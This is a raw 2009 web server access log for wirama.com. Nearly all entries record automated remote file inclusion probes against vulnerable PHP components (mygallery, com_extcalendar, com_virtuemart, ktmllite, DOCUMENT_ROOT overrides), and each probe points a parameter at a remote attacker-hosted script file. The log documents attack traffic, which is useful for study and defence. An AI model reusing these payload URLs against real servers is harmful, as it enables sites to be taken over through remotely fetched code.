87.106.54.126 - - [01/Jul/2009:15:02:43 -0700] "GET /logs/access_090531.log%20%20//class_item.php?fileExtension=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.38.0.130 - - [01/Jul/2009:15:02:47 -0700] "GET /logs/access_090531.log%20%20//class_item.php?fileExtension=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.225.104.106 - - [01/Jul/2009:15:03:46 -0700] "GET /skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
195.225.104.106 - - [01/Jul/2009:15:03:46 -0700] "GET /logs/access_090531.log//skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
195.225.104.106 - - [01/Jul/2009:15:03:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
119.93.90.155 - - [01/Jul/2009:15:04:12 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [01/Jul/2009:15:04:15 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [01/Jul/2009:15:04:15 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.227.93.172 - - [01/Jul/2009:15:05:43 -0700] "GET /logs/access_090531.log%20%20//class_item.php?fileExtension=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.225.104.106 - - [01/Jul/2009:15:11:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
195.225.104.106 - - [01/Jul/2009:15:11:56 -0700] "GET /skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
195.225.104.106 - - [01/Jul/2009:15:14:08 -0700] "GET /logs/access_090331.log//skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
195.225.104.106 - - [01/Jul/2009:15:14:08 -0700] "GET /logs/access_090330.log//skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
119.93.90.155 - - [01/Jul/2009:15:28:32 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.93.90.155 - - [01/Jul/2009:15:28:32 -0700] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.93.90.155 - - [01/Jul/2009:15:28:32 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.38.0.130 - - [01/Jul/2009:15:40:00 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.38.0.130 - - [01/Jul/2009:15:40:00 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.38.0.130 - - [01/Jul/2009:15:40:00 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.227.93.172 - - [01/Jul/2009:15:43:10 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.227.93.172 - - [01/Jul/2009:15:43:10 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.227.93.172 - - [01/Jul/2009:15:43:10 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.54.126 - - [01/Jul/2009:15:43:29 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.54.126 - - [01/Jul/2009:15:43:29 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.54.126 - - [01/Jul/2009:15:43:29 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
212.227.93.172 - - [01/Jul/2009:15:44:13 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.227.93.172 - - [01/Jul/2009:15:44:13 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.227.93.172 - - [01/Jul/2009:15:44:13 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.54.126 - - [01/Jul/2009:15:44:23 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.54.126 - - [01/Jul/2009:15:44:23 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.54.126 - - [01/Jul/2009:15:44:23 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.230 - - [01/Jul/2009:15:59:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
201.38.0.130 - - [01/Jul/2009:16:04:32 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.38.0.130 - - [01/Jul/2009:16:04:32 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.38.0.130 - - [01/Jul/2009:16:04:32 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.50 - - [01/Jul/2009:16:17:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [01/Jul/2009:16:17:41 -0700] "GET /_private/?S=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.82.228.83 - - [01/Jul/2009:16:30:38 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.82.228.83 - - [01/Jul/2009:16:30:38 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.82.228.83 - - [01/Jul/2009:16:30:38 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.230 - - [01/Jul/2009:16:46:59 -0700] "GET /?M=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
124.0.139.129 - - [01/Jul/2009:16:50:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:16:50:55 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:16:50:55 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:16:52:03 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:16:52:03 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:16:52:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:16:54:10 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:52 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:52 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:52 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:52 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:52 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:52 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:52 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:54:53 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:16:56:24 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:34 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:35 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:35 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:35 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:46 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:46 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:16:58:49 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:16:59:38 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:16:59:38 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:16:59:38 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:10 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:10 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:12 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:13 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:14 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:14 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:19 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:19 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:28 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:28 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:28 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:01:32 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:02:59 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:05:09 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:09:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:09:12 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:09:13 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:10:23 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:10:23 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:10:23 -0700] "GET /logs/access_090601.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:17:10:27 -0700] "GET /logs/access_090531.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:10:46 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:10:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:10:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:14:48 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:18:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:17:18:33 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:17:18:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:17:19:27 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:22:21 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:17:22:21 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:17:22:21 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:17:28:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:28:58 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:29:05 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:29:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:29:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:17:29:08 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:38:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:38:36 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:38:38 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:17:40:20 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
